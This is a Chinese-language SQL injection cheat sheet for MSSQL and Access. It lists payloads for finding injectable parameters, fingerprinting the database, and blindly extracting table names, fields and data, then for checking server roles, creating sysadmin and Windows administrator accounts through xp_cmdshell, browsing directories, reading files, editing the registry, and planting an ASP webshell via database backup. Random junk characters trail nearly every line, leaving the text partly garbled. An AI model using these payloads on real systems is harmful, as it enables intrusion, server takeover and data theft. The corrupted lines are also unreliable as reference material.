1.判断是否有注入;and 1=1 ;and 1=2 ]JOephX2R
2.初步判断是否是mssql ;and user>0 24#bMt#^
z< z*Wz
3.注入参数是字符'and [查询条件] and ''=' 3pvYi<<D'
!X^Hi=aV
4.搜索时没过滤参数的'and [查询条件] and '%25'=' :6XguU
/\na;GI$
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql vt//)*(.$
ujU=JlJ7dl
;and (select count(*) from msysobjects)>0 access g %f*ofb
&J_Z~^
Y RPm^kW
7 _`L$<-n
6.猜数据库 ;and (select Count(*) from [数据库名])>0 J , V
pgT9hle/
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 [`d$X^<y;
m9Ax\lf
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 -;^;2#](g
pe9@N9_5
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ][,4,?T7
BT]ua]T+
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Guh%eR'Wt
rz6uDJ"
10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- QdQd(4/1
SyO79e*t
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- h{k_6ym
h4/X
0@l`
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- tAjx\7IX
b.b@bq$1
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 2jl)mL
bLqy!QE
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
B$^7h!
R[LsE^
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- i(*I@ku
*5e+@rD`
;and 1=(select IS_MEMBER('db_owner'));-- rz%<AF Z
YzAFC11,
Po(]rQbE
9GgA 6#
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;-- &-%X:~|:X
;exec master.dbo.sp_password null,username,password;-- *XbI#L%>
w(j^ccPD
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ubYG
'xnnLCm.
;exec master.dbo.xp_cmdshell 'net user username password X<]qU3k5
XX6 T$pA6
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- :~zv t
/4$4h;_8
;exec master.dbo.xp_cmdshell 'net user username password /add';-- M\oTZ@
Sw8kIC
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- WA$JI@g
^N{ltgQY
aE|OTm+@9;
N8v'70
12.(1)遍历目录
;create table dirs(paths varchar(100), id int) Wkzs<y"
y{d^?(-
;insert dirs exec master.dbo.xp_dirtree 'c:\' ~>5#5!}@*
at|g%$%
;and (select top 1 paths from dirs)>0 6_gnEve
h
15{Y9!
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) GKiukX$'
~ttY(wCV
g>
S*<
4f^C\i+q
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- GX&b;N
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 U47}QDh
4v'A\~ZU
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ^V3v{>D>
0)!Ll*L!p
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 &\C [@_
VR5fqf|*
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 (*\jbK
i)ASsYG!
k+^'?D--'P
in-C/m#
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 7@}$|u:JUF
8K9$,Ii
xp_regread 根键, 子键, 键值名
;exec xp_regread }_
mT
l@*
4~z?"
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Bi3+)k>u7
Pw0Ci
xp_regwrite 根键, 子键, 值名, 值类型, 值
值类型有2种: REG_SZ 表示字符型, REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Xz 4 x
lb*8G
xp_regdeletevalue 根键, 子键, 值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 BV`- =wRC
B;K`q
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
IJIzXU
zTbVp8\pI
C0*@0~8$9
hsKmnH@#
14.mssql的backup创建webshell
use model TXXy\$
4Kwh?8.
create table cmd(str image); 7OCwG~_^
;Xvp6.:
insert into cmd(str) values (''); _c$9eAe
'1^B+m
backup database model to disk='c:\l.asp'; X^9d/}uTa
fq[;%cr4
;a{ :%t
Ez~'^s@
15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号 gk[{2HgN
VdSv
;and user_name()='dbo' 判断当前系统的连接用户是不是sa WKz>
!E%
P^`duZ{T
;and (select user_name())>0 爆当前系统的连接用户 -u!FOD/
`1OgYs
;and (select db_name())>0 得到当前连接的数据库 2lKV#9"
?E%ELs_Dl
k67a'pmyJ
"1`Oh<={b
16.简洁的webshell
use model SUKxkc(
qn1255fB
create table cmd(str image); 73#x|lY
[YrHA~=U
insert into cmd(str) values (''); %1 vsN-O}8
C;QAT
backup database model to disk='g:\wwwtest\l.asp';